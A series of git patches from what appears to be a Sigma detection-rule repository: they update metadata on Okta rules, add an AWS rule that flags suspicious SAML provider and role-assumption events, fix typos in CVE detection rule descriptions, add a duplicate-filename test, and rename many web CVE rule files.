security threat is detected in Okta. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm - https://developer.okta.com/docs/reference/api/system-log/ From 05d454d7943272985d59c5e1336537c8e2b67faf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:39 -0500 Subject: [PATCH 1074/1367] Update okta_unauthorized_access_to_app.yml --- rules/cloud/okta/okta_unauthorized_access_to_app.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml index 113cb352..10305024 100644 --- a/rules/cloud/okta/okta_unauthorized_access_to_app.yml +++ b/rules/cloud/okta/okta_unauthorized_access_to_app.yml @@ -4,6 +4,7 @@ description: Detects when unauthorized access to app occurs. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 097c6c3537b1ca575e0ee669a018b56295ecdc1c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:46 -0500 Subject: [PATCH 1075/1367] Update okta_user_account_locked_out.yml --- rules/cloud/okta/okta_user_account_locked_out.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_user_account_locked_out.yml b/rules/cloud/okta/okta_user_account_locked_out.yml index c036bd96..7acd02c0 100644 --- a/rules/cloud/okta/okta_user_account_locked_out.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml @@ -4,6 +4,7 @@ description: Detects when an user account is locked out. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From d1337bbfbf49152b1b2373c191e88dc32613cc23 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 20:15:36 -0500 Subject: [PATCH 1076/1367] Create aws_suspicious_saml_activity.yml --- rules/cloud/aws_suspicious_saml_activity.yml | 32 ++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/aws_suspicious_saml_activity.yml diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws_suspicious_saml_activity.yml new file mode 100644 index 00000000..44953cc7 --- /dev/null +++ b/rules/cloud/aws_suspicious_saml_activity.yml @@ -0,0 +1,32 @@ +title: AWS Suspicious SAML Activity +id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. +author: Austin Songer +status: experimental +date: 2021/09/22 +references: + - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html + - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html +logsource: + service: cloudtrail +detection: + selection1: + eventSource: sts.amazonaws.com + eventName: Assumerolewithsaml + selection2: + eventSource: iam.amazonaws.com + eventName: UpdateSAMLProvider + condition: selection1 or selection2 +level: medium +tags: + - attack.initial_access + - attack.t1078 + - attack.lateral_movement + - attack.t1548 + - attack.privilege_escalation + - attack.t1550 + - attack.t1550.001 +falsepositives: + - Automated processes that uses Terraform may lead to false positives. + - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6942b9c5e86335ba4413d9fcd6a9b2d08a90addb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 20:16:50 -0500 Subject: [PATCH 1077/1367] Update aws_suspicious_saml_activity.yml --- rules/cloud/aws_suspicious_saml_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws_suspicious_saml_activity.yml index 44953cc7..0b27875a 100644 --- a/rules/cloud/aws_suspicious_saml_activity.yml +++ b/rules/cloud/aws_suspicious_saml_activity.yml @@ -1,5 +1,5 @@ title: AWS Suspicious SAML Activity -id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. author: Austin Songer status: experimental From ab613af36528e8a929bb8d8c49e5bd99db2869dc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 22:24:24 -0500 Subject: [PATCH 1078/1367] Update sysmon_atlassian_confluence_cve_2021_26084_exploit.yml --- .../sysmon_atlassian_confluence_cve_2021_26084_exploit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index d69b708b..2714a92e 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -1,7 +1,7 @@ title: Atlassian Confluence CVE-2021-26084 id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: experimental -description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 author: Bhabesh Raj date: 2021/09/08 references: From 53f426342ca8e5255d0275723a9ffd176a5ae51a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 22:26:05 -0500 Subject: [PATCH 1079/1367] Update win_file_winword_cve_2021_40444.yml --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 2cb6e196..1787a6c1 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -1,7 +1,7 @@ title: Suspicious Word Cab File Write CVE-2021-40444 id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5 status: experimental -description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444 +description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 From 595e4b9d6dcc92cef18df13a30121078327932cb Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 06:50:18 +0200 Subject: [PATCH 1080/1367] add duplicate name file check --- tests/test_rules.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 78bc956a..16dbb0dc 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -519,10 +519,14 @@ class TestRules(unittest.TestCase): def test_file_names(self): faulty_rules = [] + name_lst = [] filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml') for file in self.yield_next_rule_file_path(self.path_to_rules): filename = os.path.basename(file) - if filename[-4:] != ".yml": + if filename in name_lst: + print(Fore.YELLOW + "Rule {} is a duplicate file name.".format(file)) + faulty_rules.append(file) + elif filename[-4:] != ".yml": print(Fore.YELLOW + "Rule {} has a invalid extension (.yml).".format(file)) faulty_rules.append(file) elif len(filename) > 74: @@ -534,6 +538,7 @@ class TestRules(unittest.TestCase): elif filename_pattern.match(filename) == None or not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) faulty_rules.append(file) + name_lst.append(filename) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is '[a-z0-9_]{10,70}\.yml' and it has to contain at least an underline character.") From 605fa2dd8083c9591251d9c793b332463981294a Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 07:58:50 +0200 Subject: [PATCH 1081/1367] update filename --- .../okta_application_sign_on_policy_modified_or_deleted.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml index 3b067027..aaccaad3 100644 --- a/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml @@ -1,9 +1,10 @@ title: Okta Application Sign-On Policy Modified or Deleted id: 8f668cc4-c18e-45fe-ad00-624a981cf88a description: Detects when an application Sign-on Policy is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -19,4 +20,4 @@ level: medium tags: - attack.impact falsepositives: - - Unknown + - Unknown \ No newline at end of file From c029e62c6423fdce4c21fcaed7f74f78d3d8a464 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:37:34 +0200 Subject: [PATCH 1082/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_4617_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_5278_exploitation_attempt.yml} | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-4617_exploitation_attempt.yml => web_cve_2010_4617_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-5278_exploitation_attempt.yml => web_cve_2010_5278_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yml b/rules/web/web_cve_2010_4617_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4617_exploitation_attempt.yml rename to rules/web/web_cve_2010_4617_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-5278_exploitation_attempt.yml rename to rules/web/web_cve_2010_5278_exploitation_attempt.yml From 8b5f62bdb72125963775ccd15ef1e20556111661 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:41:16 +0200 Subject: [PATCH 1083/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1980_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1981_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1983_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2033_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2034_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2035_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2036_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2122_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2259_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2307_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2682_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2861_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2920_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_3426_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_4231_exploitation_attempt.yml} | 0 15 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1980_exploitation_attempt.yml => web_cve_2010_1980_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1981_exploitation_attempt.yml => web_cve_2010_1981_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1983_exploitation_attempt.yml => web_cve_2010_1983_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2033_exploitation_attempt.yml => web_cve_2010_2033_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2034_exploitation_attempt.yml => web_cve_2010_2034_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2035_exploitation_attempt.yml => web_cve_2010_2035_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2036_exploitation_attempt.yml => web_cve_2010_2036_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2122_exploitation_attempt.yml => web_cve_2010_2122_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2259_exploitation_attempt.yml => web_cve_2010_2259_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2307_exploitation_attempt.yml => web_cve_2010_2307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2682_exploitation_attempt.yml => web_cve_2010_2682_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2861_exploitation_attempt.yml => web_cve_2010_2861_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2920_exploitation_attempt.yml => web_cve_2010_2920_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-3426_exploitation_attempt.yml => web_cve_2010_3426_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-4231_exploitation_attempt.yml => web_cve_2010_4231_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yml b/rules/web/web_cve_2010_1980_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1980_exploitation_attempt.yml rename to rules/web/web_cve_2010_1980_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yml b/rules/web/web_cve_2010_1981_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1981_exploitation_attempt.yml rename to rules/web/web_cve_2010_1981_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yml b/rules/web/web_cve_2010_1983_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1983_exploitation_attempt.yml rename to rules/web/web_cve_2010_1983_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yml b/rules/web/web_cve_2010_2033_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2033_exploitation_attempt.yml rename to rules/web/web_cve_2010_2033_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yml b/rules/web/web_cve_2010_2034_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2034_exploitation_attempt.yml rename to rules/web/web_cve_2010_2034_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yml b/rules/web/web_cve_2010_2035_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2035_exploitation_attempt.yml rename to rules/web/web_cve_2010_2035_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yml b/rules/web/web_cve_2010_2036_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2036_exploitation_attempt.yml rename to rules/web/web_cve_2010_2036_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yml b/rules/web/web_cve_2010_2122_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2122_exploitation_attempt.yml rename to rules/web/web_cve_2010_2122_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yml b/rules/web/web_cve_2010_2259_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2259_exploitation_attempt.yml rename to rules/web/web_cve_2010_2259_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yml b/rules/web/web_cve_2010_2307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2307_exploitation_attempt.yml rename to rules/web/web_cve_2010_2307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yml b/rules/web/web_cve_2010_2682_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2682_exploitation_attempt.yml rename to rules/web/web_cve_2010_2682_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yml b/rules/web/web_cve_2010_2861_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2861_exploitation_attempt.yml rename to rules/web/web_cve_2010_2861_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yml b/rules/web/web_cve_2010_2920_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2920_exploitation_attempt.yml rename to rules/web/web_cve_2010_2920_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yml b/rules/web/web_cve_2010_3426_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-3426_exploitation_attempt.yml rename to rules/web/web_cve_2010_3426_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yml b/rules/web/web_cve_2010_4231_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4231_exploitation_attempt.yml rename to rules/web/web_cve_2010_4231_exploitation_attempt.yml From 89776b8c14d522cc7b1d16b3aab82a18b753b112 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:44:51 +0200 Subject: [PATCH 1084/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1535_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1601_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1602_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1607_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1657_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1659_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1714_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1717_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1718_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1719_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1722_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1875_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1953_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1954_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1955_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1956_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1979_exploitation_attempt.yml} | 0 17 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1535_exploitation_attempt.yml => web_cve_2010_1535_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1601_exploitation_attempt.yml => web_cve_2010_1601_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1602_exploitation_attempt.yml => web_cve_2010_1602_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1607_exploitation_attempt.yml => web_cve_2010_1607_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1657_exploitation_attempt.yml => web_cve_2010_1657_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1659_exploitation_attempt.yml => web_cve_2010_1659_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1714_exploitation_attempt.yml => web_cve_2010_1714_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1717_exploitation_attempt.yml => web_cve_2010_1717_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1718_exploitation_attempt.yml => web_cve_2010_1718_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1719_exploitation_attempt.yml => web_cve_2010_1719_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1722_exploitation_attempt.yml => web_cve_2010_1722_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1875_exploitation_attempt.yml => web_cve_2010_1875_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1953_exploitation_attempt.yml => web_cve_2010_1953_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1954_exploitation_attempt.yml => web_cve_2010_1954_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1955_exploitation_attempt.yml => web_cve_2010_1955_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1956_exploitation_attempt.yml => web_cve_2010_1956_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1979_exploitation_attempt.yml => web_cve_2010_1979_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yml b/rules/web/web_cve_2010_1535_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1535_exploitation_attempt.yml rename to rules/web/web_cve_2010_1535_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yml b/rules/web/web_cve_2010_1601_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1601_exploitation_attempt.yml rename to rules/web/web_cve_2010_1601_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yml b/rules/web/web_cve_2010_1602_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1602_exploitation_attempt.yml rename to rules/web/web_cve_2010_1602_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yml b/rules/web/web_cve_2010_1607_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1607_exploitation_attempt.yml rename to rules/web/web_cve_2010_1607_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yml b/rules/web/web_cve_2010_1657_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1657_exploitation_attempt.yml rename to rules/web/web_cve_2010_1657_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yml b/rules/web/web_cve_2010_1659_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1659_exploitation_attempt.yml rename to rules/web/web_cve_2010_1659_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yml b/rules/web/web_cve_2010_1714_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1714_exploitation_attempt.yml rename to rules/web/web_cve_2010_1714_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yml b/rules/web/web_cve_2010_1717_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1717_exploitation_attempt.yml rename to rules/web/web_cve_2010_1717_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yml b/rules/web/web_cve_2010_1718_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1718_exploitation_attempt.yml rename to rules/web/web_cve_2010_1718_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yml b/rules/web/web_cve_2010_1719_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1719_exploitation_attempt.yml rename to rules/web/web_cve_2010_1719_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yml b/rules/web/web_cve_2010_1722_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1722_exploitation_attempt.yml rename to rules/web/web_cve_2010_1722_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yml b/rules/web/web_cve_2010_1875_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1875_exploitation_attempt.yml rename to rules/web/web_cve_2010_1875_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yml b/rules/web/web_cve_2010_1953_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1953_exploitation_attempt.yml rename to rules/web/web_cve_2010_1953_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yml b/rules/web/web_cve_2010_1954_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1954_exploitation_attempt.yml rename to rules/web/web_cve_2010_1954_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yml b/rules/web/web_cve_2010_1955_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1955_exploitation_attempt.yml rename to rules/web/web_cve_2010_1955_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yml b/rules/web/web_cve_2010_1956_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1956_exploitation_attempt.yml rename to rules/web/web_cve_2010_1956_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yml b/rules/web/web_cve_2010_1979_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1979_exploitation_attempt.yml rename to rules/web/web_cve_2010_1979_exploitation_attempt.yml From 44feb3ddf615657d05a0de8335ab8c7cfdc063b8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:46:13 +0200 Subject: [PATCH 1085/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1476_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1494_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1495_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1532_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1533_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1534_exploitation_attempt.yml} | 0 6 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1476_exploitation_attempt.yml => web_cve_2010_1476_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1494_exploitation_attempt.yml => web_cve_2010_1494_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1495_exploitation_attempt.yml => web_cve_2010_1495_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1532_exploitation_attempt.yml => web_cve_2010_1532_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1533_exploitation_attempt.yml => web_cve_2010_1533_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1534_exploitation_attempt.yml => web_cve_2010_1534_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yml b/rules/web/web_cve_2010_1476_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1476_exploitation_attempt.yml rename to rules/web/web_cve_2010_1476_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yml b/rules/web/web_cve_2010_1494_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1494_exploitation_attempt.yml rename to rules/web/web_cve_2010_1494_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yml b/rules/web/web_cve_2010_1495_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1495_exploitation_attempt.yml rename to rules/web/web_cve_2010_1495_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yml b/rules/web/web_cve_2010_1532_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1532_exploitation_attempt.yml rename to rules/web/web_cve_2010_1532_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yml b/rules/web/web_cve_2010_1533_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1533_exploitation_attempt.yml rename to rules/web/web_cve_2010_1533_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yml b/rules/web/web_cve_2010_1534_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1534_exploitation_attempt.yml rename to rules/web/web_cve_2010_1534_exploitation_attempt.yml From 934e39115937e76a18dd8a6a96c5131edc56ecc9 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:51:59 +0200 Subject: [PATCH 1086/1367] fix filename --- rules/cloud/{ => aws}/aws_suspicious_saml_activity.yml | 0 ...ion_attempt.yml => web_cve_2010_0943_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_0944_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_0985_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1219_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1304_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1305_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1306_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1307_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1308_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1312_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1313_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1314_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1345_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1353_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1354_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1470_exploitation_attempt.yml} | 0 